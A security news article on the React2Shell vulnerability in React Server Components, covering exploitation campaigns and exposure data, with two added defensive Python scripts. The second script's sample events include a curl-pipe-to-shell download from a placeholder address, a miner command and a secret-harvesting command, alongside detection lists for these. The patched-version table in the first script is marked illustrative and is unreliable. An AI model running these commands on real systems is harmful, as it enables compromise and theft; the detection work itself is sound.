React2Shell Exploitation Escalates to Large-Scale Global Attacks, Forcing Emergency Mitigation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has directed federal agencies to remediate the recent React2Shell vulnerability by December 12, 2025, in response to active, large‑scale exploitation.

The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The weakness stems from unsafe deserialization of attacker-controlled Flight payloads, which lets a remote attacker supply code that the server then executes inside the application process. Because the affected RSC packages are bundled by downstream frameworks and tooling, the issue also impacts Next.js, Waku, Vite, React Router, and RedwoodSDK.
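A first practical question for any team running one of the frameworks above is which deployments actually ship an affected RSC package. The following Python is an added example, not code from the article or from the React project: it scans an npm `package-lock.json` (lockfileVersion 2/3) for the server-side RSC packages and flags any version below the patched release of its minor line. The package names are the ones that carry the server-side Flight implementation; the `FIXED_BY_LINE` table holds illustrative values stated as an assumption and must be confirmed against the upstream advisory before use, and the sample lockfile is constructed for this example.

```python
"""Added example: flag RSC packages in a package-lock.json that are below the
patched version of their minor line. Not from the article or the React project."""
import json
import re

# Packages that implement the server side of the RSC Flight protocol.
RSC_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-turbopack",
    "react-server-dom-parcel",
}

# ASSUMPTION: minimum patched version per "major.minor" line, encoded as
# (major, minor, patch, is_release). Illustrative values; replace them with the
# versions given in the upstream advisory before relying on the result.
FIXED_BY_LINE = {
    "19.0": (19, 0, 1, 1),
    "19.1": (19, 1, 2, 1),
    "19.2": (19, 2, 1, 1),
}

_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?")


def parse_version(v):
    """'19.2.1-canary-abc' -> (19, 2, 1, 0). A pre-release sorts below the
    release it precedes, so a canary of the fixed version is still vulnerable."""
    m = _VER.match(v)
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch), 0 if pre else 1)


def classify_version(version):
    """Return 'vulnerable', 'patched' or 'unknown-line' for one RSC package version."""
    ver = parse_version(version)
    fixed = FIXED_BY_LINE.get(f"{ver[0]}.{ver[1]}")
    if fixed is None:
        return "unknown-line"  # no entry for this line; check the advisory manually
    return "patched" if ver >= fixed else "vulnerable"


def scan_lockfile(lock_text):
    """Return (install path, package, version, verdict) for every RSC package,
    including nested copies under node_modules/<dep>/node_modules/."""
    lock = json.loads(lock_text)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # "" is the root project entry
        name = path.rsplit("node_modules/", 1)[-1]
        if name in RSC_PACKAGES and "version" in meta:
            findings.append((path, name, meta["version"], classify_version(meta["version"])))
    return findings


# Constructed sample lockfile: one direct RSC dependency below the fix, one
# nested copy at the fixed version.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.1.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.0"},
        "node_modules/next/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
    },
})

if __name__ == "__main__":
    for path, name, version, verdict in scan_lockfile(SAMPLE_LOCK):
        print(f"{verdict:12} {name}@{version}  ({path})")
```

Run it against every lockfile in a container image or repository rather than only the top-level one; nested copies under a framework's own `node_modules` are easy to miss and are exactly what the scan reports separately.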

“A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said. “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”

Since its public disclosure on December 3, 2025, the flaw has been leveraged by multiple threat actors across different campaigns for reconnaissance, initial access, and delivery of numerous malware families.

The development led CISA to add the bug to its Known Exploited Vulnerabilities (KEV) catalog on Friday, December 5, initially setting December 26 as the remediation deadline for federal agencies. The deadline has since been accelerated to December 12, 2025, underscoring the operational impact and threat level.

Cloud security company Wiz reported a “rapid wave of opportunistic exploitation” of the vulnerability, with most activity focusing on internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud environments.

Image Source: Cloudflare

Cloudflare, which is also monitoring exploitation patterns, noted that threat actors are using internet-wide scanning and asset discovery platforms to enumerate exposed systems running React and Next.js applications. In some cases, reconnaissance activity has deliberately excluded Chinese IP address ranges from targeting.

“Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said.

The same activity has also selectively focused on government (.gov) domains, academic research organizations, and critical‑infrastructure entities. Among those probed was a national authority overseeing the import and export of uranium, rare metals, and nuclear fuel.

Some of the other notable findings are listed below –

  • Prioritizing high‑sensitivity technology assets such as enterprise password managers and secure‑vault offerings, likely to enable downstream supply chain compromises
  • Targeting edge‑exposed SSL VPN appliances whose administrative interfaces may embed React-based components
  • Initial scanning and exploitation traffic observed from IP ranges historically linked to Asia-affiliated threat clusters

In its own honeypot-based analysis, Kaspersky stated it registered over 35,000 exploitation attempts in a single day on December 10, 2025. Typical attack chains started with basic system reconnaissance (e.g., `whoami`), followed by deployment of cryptocurrency miners or botnet malware such as Mirai/Gafgyt variants and RondoDox.

Some of the additional payloads observed in the wild include Cobalt Strike beacons, Sliver, Fast Reverse Proxy (FRP), a monitoring utility called Nezha, a Node.js payload that exfiltrates sensitive files and abuses TruffleHog and Gitleaks to harvest secrets, and a Go-based backdoor offering reverse shell, reconnaissance, and command-and-control (C2) functions.
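The attack chains described in the two paragraphs above (reconnaissance with `whoami`, miner and botnet drops, a Node.js payload driving TruffleHog and Gitleaks) translate directly into host-level detections: the web server process should almost never spawn those children. The following Python is an added example, not from the article or any vendor cited in it; the pipe-delimited process-creation event format and the sample lines are constructed, and 198.51.100.7 is a documentation-range placeholder address.

```python
"""Added example: detect post-exploitation behaviour of the kind reported for
React2Shell from process-creation events. Constructed format and sample data."""
import shlex
from collections import namedtuple

Event = namedtuple("Event", "ts host ppid pid parent cmdline")

# Indicators drawn from the reporting: recon binaries, secret hunters, miners.
RECON = {"whoami", "id", "uname", "hostname"}
SECRET_HUNTERS = {"trufflehog", "gitleaks"}
MINER_HINTS = ("xmrig", "stratum+tcp://", "stratum+ssl://")
# Process names of the Node.js server that an RCE in RSC would execute inside.
WEB_SERVER_PARENTS = {"node", "nodejs", "next-server"}


def parse_event(line):
    """Parse 'ts|host|ppid|pid|parent_comm|cmdline' (constructed format)."""
    ts, host, ppid, pid, parent, cmdline = line.split("|", 5)
    return Event(ts, host, int(ppid), int(pid), parent, cmdline)


def classify_event(ev):
    """Return detection labels for one process-creation event (empty if benign)."""
    labels = []
    try:
        argv = shlex.split(ev.cmdline)
    except ValueError:  # unbalanced quotes in a hostile command line
        argv = ev.cmdline.split()
    if not argv:
        return labels
    prog = argv[0].rsplit("/", 1)[-1]
    from_web = ev.parent in WEB_SERVER_PARENTS

    # Recon and download-and-run only matter when the web server is the parent.
    if from_web and prog in RECON:
        labels.append("recon-from-webserver")
    if (from_web and prog in {"sh", "bash"} and "-c" in argv and "|" in ev.cmdline
            and ("curl" in ev.cmdline or "wget" in ev.cmdline)):
        labels.append("download-and-execute")
    # Secret hunters and miners are suspicious on a web host whatever the parent,
    # since the first-stage shell often spawns them rather than node itself.
    if any(a.rsplit("/", 1)[-1] in SECRET_HUNTERS for a in argv):
        labels.append("secret-harvesting")
    if any(h in ev.cmdline for h in MINER_HINTS):
        labels.append("cryptominer")
    return labels


def detect(lines):
    """Return (ts, host, pid, labels) for every event that triggers a detection."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        labels = classify_event(ev)
        if labels:
            hits.append((ev.ts, ev.host, ev.pid, labels))
    return hits


# Constructed events mirroring the reported chain: recon, staged download,
# miner, secret harvesting, plus two benign lines that must not fire.
SAMPLE_EVENTS = [
    "2025-12-10T08:01:02Z|web-1|1|412|systemd|/usr/bin/node server.js",
    "2025-12-10T08:01:05Z|web-1|412|9001|node|whoami",
    "2025-12-10T08:01:06Z|web-1|412|9002|node|sh -c 'curl -s http://198.51.100.7/x.sh | sh'",
    "2025-12-10T08:01:09Z|web-1|9002|9003|sh|/tmp/.x/xmrig -o stratum+tcp://pool.example:3333",
    "2025-12-10T08:02:00Z|web-1|412|9010|node|node /tmp/harvest.js --run trufflehog filesystem /srv",
    "2025-12-10T08:02:03Z|web-1|412|9011|node|gitleaks detect --source /srv/app",
    "2025-12-10T08:03:00Z|web-1|1|500|cron|/usr/sbin/logrotate /etc/logrotate.conf",
]

if __name__ == "__main__":
    for ts, host, pid, labels in detect(SAMPLE_EVENTS):
        print(ts, host, pid, ",".join(labels))
```

The parent-process condition is what keeps the recon rule quiet: `whoami` from an interactive shell is routine, `whoami` as a child of the Node.js server is not. Adapt `WEB_SERVER_PARENTS` to the actual process name of the deployment (a custom server, a PM2-managed process, or the container entrypoint).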

In parallel, React2Shell has led to the publication of over 140 public proof-of-concept exploits of mixed quality, roughly half of them broken, inaccurate, or otherwise non-functional, according to VulnCheck. The usable exploit repositories often implement logic to deploy in-memory web shells like Godzilla, scan for vulnerable instances, and in some cases install a lightweight web application firewall (WAF) to filter out competing malicious traffic.

Security researcher Rakesh Krishnan has also identified an open directory hosted on “154.61.77[.]105:8082” that contains a proof-of-concept (PoC) exploit script for CVE-2025-55182 along with two additional files –

  • “domains.txt,” listing 35,423 domains
  • “next_target.txt,” listing 596 URLs, including organizations such as Dia Browser, Starbucks, Porsche, and Lululemon

Analysis suggests the unknown threat actor is continuously scanning the targets enumerated in the second file and compromising hundreds of sites as the list is updated.

Cybersecurity and cyber insurance provider Coalition has compared React2Shell to the 2021 Log4Shell vulnerability (CVE-2021-44228), characterizing it as a “systemic cyber risk aggregation event.”

According to recent data from The Shadowserver Foundation, there are more than 137,200 internet-exposed IP addresses running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).
